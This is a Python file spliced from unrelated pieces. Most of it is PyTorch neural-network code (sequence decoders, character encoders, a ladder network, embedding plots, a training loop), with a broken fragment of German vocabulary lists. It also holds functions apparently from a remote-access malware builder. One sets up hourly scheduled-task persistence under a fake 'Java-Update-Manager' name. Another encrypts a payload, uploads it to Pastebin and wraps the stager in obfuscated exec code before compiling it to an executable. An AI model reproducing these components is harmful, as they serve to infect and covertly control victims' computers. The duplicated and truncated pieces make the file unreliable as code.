def _add_scheduled_task(value=None, name='Java-Update-Manager'):
    """Establish persistence on Windows via an hourly scheduled task.

    The `value` and `name` parameters are accepted for interface
    compatibility but are overwritten inside the Windows branch
    (value -> sys.argv[0], name -> a random identifier).

    Returns:
        (True, schtasks output with quotes stripped) on success,
        (False, None) on failure or on non-Windows platforms.
    """
    try:
        if os.name == 'nt' and not _methods['scheduled_task'].established:
            value = sys.argv[0]
            name = util.variable(random.randint(6, 11))
            if value and os.path.isfile(value):
                # BUG FIX: quote the task name and target path so values
                # containing spaces are not split into extra SCHTASKS tokens.
                # NOTE(review): shell=True with an interpolated string is
                # command injection-prone; inputs here are locally generated.
                result = subprocess.check_output(
                    'SCHTASKS /CREATE /TN "{}" /TR "{}" /SC hourly /F'.format(name, value),
                    shell=True)
                if 'SUCCESS' in result:
                    return (True, result.replace('"', ''))
    except Exception as e:
        util.log('Add scheduled task error: {}'.format(str(e)))
    return (False, None)
def _add_scheduled_task(value=None, name='Java-Update-Manager'):
    """Register an hourly Windows scheduled task pointing at this script.

    NOTE(review): this is a byte-for-byte duplicate of the preceding
    definition; at import time this later one wins.

    Returns (True, cleaned schtasks output) on success, else (False, None).
    """
    try:
        on_windows = os.name == 'nt'
        already_established = _methods['scheduled_task'].established
        if on_windows and not already_established:
            value = sys.argv[0]
            name = util.variable(random.randint(6, 11))
            if value and os.path.isfile(value):
                command = 'SCHTASKS /CREATE /TN {} /TR {} /SC hourly /F'.format(name, value)
                result = subprocess.check_output(command, shell=True)
                if 'SUCCESS' in result:
                    return (True, result.replace('"', ''))
    except Exception as e:
        util.log('Add scheduled task error: {}'.format(str(e)))
    return (False, None)
def decoder(self, last_hidden, targets):
    """Autoregressively decode up to self.max_len steps from an encoder state.

    Args:
        last_hidden: encoder final hidden state, shape (batch, hidden_dim).
        targets: LongTensor of gold tokens (batch, seq_len) for teacher
            forcing, or None to sample every step.

    Returns:
        Stacked per-step logits, shape (batch, max_len, vocab).
    """
    batch_size = last_hidden.shape[0]
    outputs = []
    # Initialize decoder state: zero cell, hidden carried over from encoder.
    cell = variable(torch.zeros(batch_size, last_hidden.shape[1]))
    hidden = last_hidden
    # Every sequence starts from the start-of-sequence token.
    step = variable(torch.LongTensor(batch_size, ).fill_(self.init_idx))
    for i in range(self.max_len):
        hidden, cell = self.dec(self.emb(step), (hidden, cell))
        output = self.lin(hidden)
        # BUG FIX: len(targets) is the batch dimension (size(0)), but `i`
        # indexes the time dimension `targets[:, i]`; bound by size(1).
        if targets is not None and i < targets.size(1):
            step = targets[:, i]  # teacher forcing
        else:
            # Sample the next input token from the softmax distribution.
            step = torch.multinomial(F.softmax(output, dim=-1), 1).squeeze(-1)
        outputs.append(output)
    outputs = torch.stack(outputs, dim=1)
    return outputs
def exe(options, filename):
    """Compile a generated Python client into a standalone executable.

    Collects hidden imports from the payload file and a remote package
    listing, fills in the PyInstaller spec template, runs PyInstaller,
    removes intermediates, and returns the path of the built .exe.
    (Python 2 codebase: `file()`, `urllib.urlopen`.)

    Raises:
        ClientError: wrapping any underlying failure.
    """
    try:
        orig = os.getcwd()
        os.chdir(os.path.dirname(filename))
        pyname = os.path.basename(filename)
        name = os.path.splitext(pyname)[0]
        dist = os.path.dirname(filename)
        key = util.variable(16)
        icon = options.icon if os.path.isfile('resources/icon/%s.ico' % options.icon) else None
        # Hidden imports: union of `import X` lines found in the payload
        # itself and in the remote listing named by setup.sqlpackages.json.
        pkgs = list(set(
            [i.strip().split()[1]
             for i in open(filename).read().splitlines()
             if i.strip().split()[0] == 'import'] +
            [i.strip().split()[1]
             for i in urllib.urlopen(
                 json.loads(open('resources/setup.sqlpackages.json').read()).get('w')
             ).read().splitlines()
             if i.strip().split()[0] == 'import'
             if len(str(i.strip().split()[1])) < 35]))
        # BUG FIX: `icon` may be None and str.replace(..., None) raises a
        # TypeError; substitute an empty string when no icon file exists.
        spec = open('resources/pyinstaller.spec', 'r').read(
            ).replace('[HIDDEN_IMPORTS]', str(pkgs)
            ).replace('[ICON_PATH]', icon or ''
            ).replace('[PY_FILE]', pyname
            ).replace('[DIST_PATH]', dist
            ).replace('[NAME]', name
            ).replace('[128_BIT_KEY]', key)
        fspec = os.path.join(dist, name + '.spec')
        with file(fspec, 'w') as fp:
            fp.write(spec)
        make = subprocess.Popen('%s -m PyInstaller %s' % (sys.executable, fspec),
                                0, None, None, subprocess.PIPE, subprocess.PIPE,
                                shell=True)
        # Renamed from `exe` so the local no longer shadows this function.
        exe_path = os.path.join(os.path.join(dist, 'dist'), name + '.exe')
        _ = map(util.delete, (filename, fspec, os.path.join(dist, 'build')))
        os.chdir(orig)
        return exe_path
    except Exception as e3:
        # BUG FIX: the handler referenced the undefined name `client_exe`
        # (a NameError inside the except block); use the literal name.
        raise ClientError('{} error: {}'.format('exe', str(e3)))
def main():
    """Load a trained RNN, t-SNE its word embeddings, and plot the words."""
    model = torch.load('rnn.pt')
    embeddings = model.x
    # Vocabulary file: one token per line, index == embedding row.
    with open('ptb/train.txt.vcb', "r") as vocab_file:
        vocabulary = [w.strip() for w in vocab_file.readlines()]
    vocab_size = len(vocabulary)
    words = variable(torch.LongTensor(range(vocab_size)).cuda())
    # BUG FIX: original read `.cpu()numpy()` (missing dot) — a SyntaxError.
    wv = embeddings(words).data.cpu().numpy()
    tsne = TSNE(n_components=2, random_state=0)
    np.set_printoptions(suppress=True)
    # Project only the first 1000 embeddings to keep t-SNE fast.
    Y = tsne.fit_transform(wv[:1000, :])
    plt.scatter(Y[:, 0], Y[:, 1])
    for label, x, y in zip(vocabulary, Y[:, 0], Y[:, 1]):
        plt.annotate(label, xy=(x, y), xytext=(0, 0), textcoords='offset points')
    # NOTE(review): savefig after show() writes an empty figure on many
    # backends — confirm the intended order.
    plt.show()
    plt.savefig('wordsssss')
def forward(self, input_):
    '''
    Character-CNN word encoder.

    @input_: list of words (strings). Each word is wrapped in start/end
    sentinel characters chr(5)/chr(6) and right-padded with chr(7) so all
    rows share one length; characters are embedded by their ordinal.
    Returns a (batch_size, res_hidden) feature tensor.
    '''
    batch_size = len(input_)
    lengths = [len(wd)+2 for wd in input_]
    max_len = max(lengths)
    #ord('\a') = 7. This will be my buffer character.
    input_words = [chr(5) + wd + chr(6) + chr(7)*(max_len-len(wd)) for wd in input_]
    # FIX: the comprehension variable previously shadowed the builtin `chr`.
    input_words = [[ord(ch) for ch in wd] for wd in input_words]
    # batch_size x character_vector_dim x (longest word + 2)
    input_embedding = self.x(variable(T.LongTensor(input_words))).transpose(1,2)
    # Each convolution is max-pooled over the length dimension, leaving
    # batch_size x filters per branch.
    c2 = F.relu(self.conv2(input_embedding).max(2)[0])
    c3 = F.relu(self.conv3(input_embedding).max(2)[0])
    c4 = F.relu(self.conv4(input_embedding).max(2)[0])
    c2 = c2.resize(batch_size, self.convHidden_size2)
    c3 = c3.resize(batch_size, self.convHidden_size3)
    c4 = c4.resize(batch_size, self.convHidden_size4)
    conv_out = T.cat([c2, c3, c4], 1)
    # Three fully-connected "Res" layers form the output head.
    fc1 = F.relu(self.Res1(conv_out))
    fc2 = F.relu(self.Res2(fc1))
    fc3 = F.relu(self.Res3(fc2))
    return fc3
def forward(self, input_):
    '''
    Bidirectional character-LSTM word encoder.

    @input_: list of words (strings) — NOTE(review): the original
    annotation said "LongTensor containing indices", but the body
    iterates characters of each string; confirm against callers.

    Runs one LSTM over each word's characters forward and one over the
    reversed word, snapshots each word's hidden state at its true
    (unpadded) length, and returns fOut(h_fwd) + bOut(h_bwd).
    '''
    batch_size = len(input_)
    lengths = [len(wd) for wd in input_]
    max_len = max(lengths)
    #ord('\a') = 7. This will be my buffer character.
    # Forward copy and reversed copy, both right-padded with chr(7).
    input_back = [wd[::-1] + chr(7)*(max_len-len(wd)) for wd in input_]
    input_forw = [wd + chr(7)*(max_len-len(wd)) for wd in input_]
    # Zero initial (h, c) for both directions.
    h = variable(T.zeros(batch_size, self._state_size))
    c = variable(T.zeros(batch_size, self._state_size))
    h2 = variable(T.zeros(batch_size, self._state_size))
    c2 = variable(T.zeros(batch_size, self._state_size))
    h_output = [None]*batch_size
    h2_output = [None]*batch_size
    for t in range(max_len):
        # Character ordinals at timestep t across the batch (forward).
        chars = [None]*batch_size
        for i in range(batch_size):
            chars[i] = ord(input_forw[i][t])
        f = self.x(variable(T.LongTensor(chars)))
        #I wanted to do the following line of code. but it didnt work so I used the above.
        #f = self.x(variable(T.LongTensor([ord(wd[t]) for wd in input_forw])))
        h, c = self.fLSTM(f, (h, c))
        # Same extraction for the backward (reversed) strings.
        chars = [None]*batch_size
        for i in range(batch_size):
            chars[i] = ord(input_back[i][t])
        b = self.x(variable(T.LongTensor(chars)))
        #Same as above
        #b = self.x(variable(T.LongTensor([ord(wd[t]) for wd in input_back])))
        h2, c2 = self.bLSTM(b, (h2, c2))
        # Record the hidden state of any word that ends at this timestep,
        # ignoring subsequent padding steps.
        for idx, l in enumerate(lengths):
            if l == t+1:
                h_output[idx] = h[idx]
                h2_output[idx] = h2[idx]
    h_output = T.stack(h_output, 0)
    h2_output = T.stack(h2_output, 0)
    return self.fOut(h_output) + self.bOut(h2_output)#T.stack(output, 1)
def py(options, payload='payload.py', stager='stager.py'):
    """Generate a Python client stager from payload/stager templates.

    Optionally XOR-encrypts the payload (then uploads it to Pastebin) and
    obfuscates the stager (marshal + zlib + base64), writes the stager to
    a temp-directory file, and — when options.type == 'exe' — hands it to
    exe() for compilation. Returns the generated file's path.

    Raises:
        ClientError: wrapping any underlying failure.
    """
    try:
        with open(payload, 'r') as fp:
            payload = fp.read()
        with open(stager, 'r') as fp:
            stager = fp.read()
        stager = '\n'.join([
            '#!/usr/bin/python',
            "from __future__ import print_function",
            stager,
            "if __name__=='__main__':",
            "\t{}=main(config={})".format(
                util.variable(1), json.dumps(dict(options._get_kwargs())))])
        color = colorama.Fore.RESET
        name = 'byob_%s.py' % util.variable(3)
        # BUG FIX: `os.name is 'nt'` compared identity, not equality.
        tmp_dir = os.path.expandvars('%TEMP%') if os.name == 'nt' else '/tmp'
        path = os.path.join(tmp_dir, name)
        if options.name:
            name = options.name
            path = os.path.join(tmp_dir, name)
        if options.encrypt:
            key = os.urandom(16)
            print(colorama.Fore.RESET + colorama.Style.BRIGHT +
                  "Encrypting payload ({:,} bytes)...\n".format(len(payload)))
            code = crypto.encrypt_xor(payload, key, block_size=8, key_size=16,
                                      num_rounds=32, padding='\x00')
            diff = round(
                float(100.0 * float(1.0 - float(len(code)) / float(len(payload)))))
            print(colorama.Fore.GREEN + colorama.Style.BRIGHT + "[+] " +
                  colorama.Fore.RESET + "Payload encryption complete")
            # BUG FIX: .ljust() was chained onto print()'s return value
            # (None -> AttributeError) and the format arguments were
            # scrambled (a stray literal 4, size-direction arg outside the
            # call, len(stager) where the payload length was meant).
            print((color + colorama.Style.DIM +
                   " (Plaintext {:,} bytes {} to ciphertext {:,} bytes ({}% {})".format(
                       len(payload), 'increased' if diff else 'reduced',
                       len(code), diff,
                       'larger' if diff else 'smaller')).ljust(80 - len("[+] ")))
            payload = code
            url = util.pastebin(payload)
            print(colorama.Fore.GREEN + colorama.Style.BRIGHT + "[+] " +
                  colorama.Fore.RESET + "Upload to Pastebin complete")
            print(color + colorama.Style.DIM +
                  " ({:,} bytes uploaded to: {}".format(
                      len(payload), url).ljust(80 - len("[+] ")))
        if options.obfuscate:
            # NOTE: marshal output is specific to the Python version that
            # compiles it; the stager must run under the same version.
            code = "import zlib,base64,marshal;exec(marshal.loads(zlib.decompress(base64.b64decode({}))))".format(
                repr(base64.b64encode(
                    zlib.compress(marshal.dumps(compile(stager, '', 'exec')), 9))))
            diff = round(
                float(100.0 * float(1.0 - float(len(code)) / float(len(stager)))))
            print(colorama.Fore.GREEN + colorama.Style.BRIGHT + "[+] " +
                  colorama.Fore.RESET +
                  "Stager obfuscation and minification complete")
            # BUG FIX: same misplaced .ljust() as above.
            print((color + colorama.Style.DIM +
                   " ({:,} bytes {} to {:,} bytes ({}% {})".format(
                       len(stager), 'increased' if diff else 'reduced',
                       len(code), diff,
                       'larger' if diff else 'smaller')).ljust(80 - len("[+] ")))
            stager = code
        with file(path, 'w') as fp:
            fp.write(stager)
        print(colorama.Fore.GREEN + colorama.Style.BRIGHT + "[+] " +
              colorama.Fore.RESET + "Client stager generation complete")
        print(color + colorama.Style.DIM +
              " ({:,} bytes written to file: {})".format(
                  len(stager), path).ljust(80 - len("[+] ")))
        if options.type == 'exe':
            # BUG FIX: exe() requires the stager filename as its second
            # argument; it was previously called with options alone.
            path = exe(options, path)
        return path
    except Exception as e:
        raise ClientError(str(e))
# ---- Top-level training driver ----
# NOTE(review): `train_idx`, `valid_idx`, `train_tok`, `valid_tok`, `model`,
# `args`, and the helpers (data_generator, repackage_hidden, clip_gradients,
# variable, six) are defined earlier in the file / project.
train_offsets = [int(l.strip()) for l in train_idx.readlines()]
valid_offsets = [int(l.strip()) for l in valid_idx.readlines()]
train_datagen = data_generator(train_tok, train_offsets, args.batchsize)
valid_datagen = data_generator(valid_tok, valid_offsets, args.batchsize)
# Full batches per split; any remainder examples are dropped.
train_batches = len(train_offsets) // args.batchsize
valid_batches = len(valid_offsets) // args.batchsize
for E in range(args.epochs):
    model.train()
    hidden = model.init_hidden(args.batchsize)
    for B in range(train_batches):
        max_len, input_, mask, target = six.next(train_datagen)
        # Every sequence in the batch must meet the minimum length.
        assert mask.sum(1).min() >= args.minlength
        input_ = variable(input_)
        mask = variable(mask)
        target = variable(target)
        # Detach the recurrent state from the previous batch's graph so
        # backprop does not extend across batches.
        hidden = repackage_hidden(hidden)
        # NOTE(review): `hidden` is never passed to model.forward — confirm
        # whether the model keeps its state internally or this is a bug.
        output = model.forward(input_)
        # Zero out positions past each sequence's true length.
        masked_output = mask.unsqueeze(2).expand_as(output) * output
        # Pick out the score of the target token at every position.
        # Assumes `output` holds log-probabilities — TODO confirm.
        masked_loss = -masked_output.gather(
            2, target.view(args.batchsize, max_len, 1)
        )[:, :, 0]
        # Average loss over the number of real (unmasked) tokens.
        loss = masked_loss.sum() / mask.sum()
        loss.backward()
        clip_gradients(model, args.gradnorm)
"Deutschland", "Deutsch", "USA", "Englisch", "Frankreich", "Franzoesisch", "Griechenland", "Griechisch", "Norwegen", "Norwegisch", "Schweden", "Schwedisch", "Polen", "Polnisch", "Ungarn", "Ungarisch" ] words_inputs = [ "male", "female", "USA", "America", "play", "playing", "man", "woman" ] loaded_model = torch.load('rnn.pt') embeddings = loaded_model.x vocab_file = open('ptb/train.txt.vcb', "r") vocab = [w.strip() for w in vocab_file.readlines()] vocab_size = len(vocab) vocab_file.close() words = variable(torch.LongTensor(range(vocab_size)).cuda()) vectors = embeddings(words).data.cpu().numpy() def draw_words(model, words, pca=False, alternate=True, arrows=True, x1=3, x2=3, y1=3, y2=3, title=''): if pca:
def forward(self, x):
    """Ladder-network forward pass.

    Runs three passes over the L layers: a noisy (corrupted) encoder, a
    clean encoder, and a top-down denoising decoder.

    Returns:
        (y_tilde, y, rec_loss): noisy encoder output, clean encoder
        output, and the lambda-weighted layer-wise reconstruction loss.
    """
    self.count += 1
    batch_size = x.size()[0]
    # Per-layer buffers, indexed 0..L (index 0 is the input layer).
    h_tilde = alloc_list(self.L + 1)
    z_tilde = alloc_list(self.L + 1)
    h = alloc_list(self.L + 1)
    z = alloc_list(self.L + 1)
    z_pre = alloc_list(self.L + 1)
    mu = alloc_list(self.L + 1)
    sigma = alloc_list(self.L + 1)
    u = alloc_list(self.L + 1)
    z_hat = alloc_list(self.L + 1)
    z_hat_bn = alloc_list(self.L + 1)
    # ---- Noisy (corrupted) encoder path ----
    h_tilde[0] = z_tilde[0] = noised(x)
    for l in range(1, self.L + 1):
        z_tilde[l] = noised(
            self.batchnorm(self.W[l](h_tilde[l - 1]), l, 'noisy'))
        _beta = self.beta[l].unsqueeze(0)
        _gamma = self.gamma[l].unsqueeze(0)
        # Broadcast per-channel scale/shift over 4-D (conv) activations.
        if z_tilde[l].dim() == 4:
            _beta = _beta.unsqueeze(2).unsqueeze(3)
            _gamma = _gamma.unsqueeze(2).unsqueeze(3)
        _beta = _beta.expand_as(z_tilde[l])
        _gamma = _gamma.expand_as(z_tilde[l])
        h_tilde[l] = self.act[l](_gamma * (z_tilde[l] + _beta))
        #print 'h_tilde', l, var_to_numpy(h_tilde[l]).max(), var_to_numpy(h_tilde[l]).min()
        assert not anynan(h_tilde[l].data)
    y_tilde = h_tilde[self.L]
    # ---- Clean encoder path ----
    h[0] = z[0] = x
    for l in range(1, self.L + 1):
        z_pre[l] = self.W[l](h[l - 1])
        # Batch statistics come from the batch when training; otherwise
        # from the stored running mean/var.
        if self.training:
            mu[l], var = batchnorm_mean_var(z_pre[l])
            sigma[l] = (var + _eps).sqrt()
        else:
            mu[l] = variable(self.mean[l]).unsqueeze(0)
            sigma[l] = (variable(self.var[l]) + _eps).sqrt().unsqueeze(0)
        if z_pre[l].dim() == 4:
            mu[l] = mu[l].unsqueeze(2).unsqueeze(3)
            sigma[l] = sigma[l].unsqueeze(2).unsqueeze(3)
        # NOTE(review): recomputes self.W[l](h[l - 1]) although z_pre[l]
        # already holds that value — confirm the duplication is intended.
        z[l] = self.batchnorm(self.W[l](h[l - 1]), l, 'clean')
        _beta = self.beta[l].unsqueeze(0)
        _gamma = self.gamma[l].unsqueeze(0)
        if z_tilde[l].dim() == 4:
            _beta = _beta.unsqueeze(2).unsqueeze(3)
            _gamma = _gamma.unsqueeze(2).unsqueeze(3)
        _beta = _beta.expand_as(z[l])
        _gamma = _gamma.expand_as(z[l])
        h[l] = self.act[l](_gamma * (z[l] + _beta))
        #print 'h', l, var_to_numpy(h[l]).max(), var_to_numpy(h[l]).min()
        assert not anynan(h[l].data)
    y = h[self.L]
    # ---- Decoder / denoising path, top layer down to the input ----
    for l in range(self.L, -1, -1):
        if l == self.L:
            u[l] = self.batchnorm(h_tilde[self.L], l, 'dec')
        else:
            u[l] = self.batchnorm(self.V[l + 1](z_hat[l + 1]), l, 'dec')
        # Denoise the corrupted activation given the top-down signal.
        z_hat[l] = self.g[l](z_tilde[l], u[l])
        if l != 0:
            # Seems that they are not normalizing z_hat on the
            # first layer...
            _mu = mu[l].expand_as(z_hat[l])
            _sigma = sigma[l].expand_as(z_hat[l])
            assert (_sigma.data == 0).sum() == 0
            z_hat_bn[l] = (z_hat[l] - _mu) / _sigma
        else:
            z_hat_bn[l] = z_hat[l]
        #print 'z_hat', l, var_to_numpy(z_hat[l]).max(), var_to_numpy(z_hat[l]).min()
        #print 'z_hat_bn', l, var_to_numpy(z_hat_bn[l]).max(), var_to_numpy(z_hat_bn[l]).min()
        assert not anynan(z_hat_bn[l].data)
    # Layer-wise reconstruction cost, weighted by lambda_ per layer.
    rec_loss = 0
    for l in range(0, self.L + 1):
        rec_loss += self.lambda_[l] * ((z[l] - z_hat_bn[l])**2).mean()
    return y_tilde, y, rec_loss
def noisify(x, std=.1, train=False):
    """Add zero-mean Gaussian noise with stddev `std` to x while training.

    When train is False the additive term is the integer 0, so the input
    is returned unchanged (as x + 0).
    """
    jitter = variable(T.randn(x.size()) * std) if train else 0
    return x + jitter